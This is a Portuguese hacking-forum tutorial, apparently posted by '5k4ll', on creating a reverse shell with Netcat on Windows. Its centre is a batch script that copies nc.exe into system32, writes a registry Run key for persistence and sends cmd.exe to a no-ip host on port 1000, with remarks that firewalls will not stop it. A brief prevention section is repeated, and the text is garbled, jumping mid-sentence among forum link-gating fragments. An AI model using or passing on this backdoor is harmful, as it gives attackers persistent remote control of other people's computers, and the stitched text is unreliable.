Criando uma conexão reversa com o NetCat
Netcat
O Netcat é uma ferramenta simples e eficaz para realização de consultoria em redes. Devido à sua versatilidade, o programa chegou a ser considerado o canivete suíço do TCP/IP pela maioria dos usuários. Possui versões para Linux e Windows. Nesse caso nosso ambiente de trabalho será o Windows por ser de mais fácil acesso apesar do Linux oferecer outras ferramentas interessantes. O download do NC (netcat) está no final do tutorial.
Uma vez baixado você deve extraí-lo para a pasta system32 do Windows (normalmente C:\Windows\system32\). Para acessar o programa você deverá usar o prompt de comando.
- O prompt de comando
O interpretador de comandos pode ser acionado digitando-se CMD no menu Iniciar/Executar. Ele pode ser também encontrado no item Acessórios do *Menu iniciar. Não é difícil usar os comandos do Windows e grande número deles permanece igual aos antigos comandos do DOS. O conhecimento de alguns comandos será necessário mais adiante no tutorial. Para mais Apenas usuários registrados e ativados podem ver os links., Assim você sempre terá acesso a sua Shell remota no horário que você escolheu. E não limite-se a apenas uma você tem milhares de portas e 24 horas para ter quantas Shell’s quiser.
Como se prevenir
Do meu conhecimento o único antivírus que detecta o Netcat como uma ameaça é o AVG. Isso porque como eu disse o Netcat é uma ferramenta para realização de consultorias em redes. Mas por seu tão versátil nos possibilita tantas coisas como essa conexão reversa.
Por ser uma conexão reversa Firewall’s não serão eficientes.
Se você ver o Netcat seguido de algum programa ou arquivo em lote desconhecido não execute.
Procure ficar de olho no seu regitsro principalmente no seguinte caminho:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Para ter acesso ao registro do Windows vá no Menu Iniciar – Executar e digite regedit.
No mais não tenha medo de usufruir dessa poderosa ferramenta, apenas tome cuidado para não ser um alvo dela.
Dúvidas perguntem.
[size="3"][color="#FF0000"]
Apenas usuários registrados e ativados podem ver os links., [URL=https://forum.guiadohacker.com.br/vb5/register]Clique aqui para se cadastrar...]https://www.youtube.com/watch?v=yKK3LzPnh6k"]Clique aqui[/ame]
Depois de feito isso é so configurar seu nc.bat novamente. No lugar do seu ip vc deve colocar seu endereço. Por exemplo:
Código:
@echo off @break off copy nc.exe c:\windows\system32 reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NC /d "at 14:00 nc.exe igormuniz.no-ip.org 1000 -e cmd.exe" start c:\windows\system32\nc.exe seu_ip 1000 -e cmd.exe at 14:00 nc.exe igormuniz.no-ip.org 1000 -e cmd.exe
Como se prevenir
Do meu conhecimento o único antivírus que detecta o Netcat como uma ameaça é o AVG. Isso porque como eu disse o Netcat é uma ferramenta para realização de consultorias em redes. Mas por seu tão versátil nos possibilita tantas coisas como essa conexão reversa.
Por ser uma conexão reversa Firewall’s não serão eficientes.
Se você ver o Netcat seguido de algum programa ou arquivo em lote desconhecido não execute.
Procure ficar de olho no seu regitsro principalmente no seguinte caminho:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Para ter acesso ao registro do Windows vá no Menu Iniciar – Executar e digite regedit.
No mais não tenha medo de usufruir dessa poderosa ferramenta, apenas tome cuidado para não ser um alvo dela.
Dúvidas perguntem.
Apenas usuários registrados e ativados podem ver os links., [URL=https://forum.guiadohacker.com.br/vb5/register]Clique aqui para se cadastrar..." data-vcode="yKK3LzPnh6k"" data-vprovider="youtube" >
Créditos: 5k4ll
Comment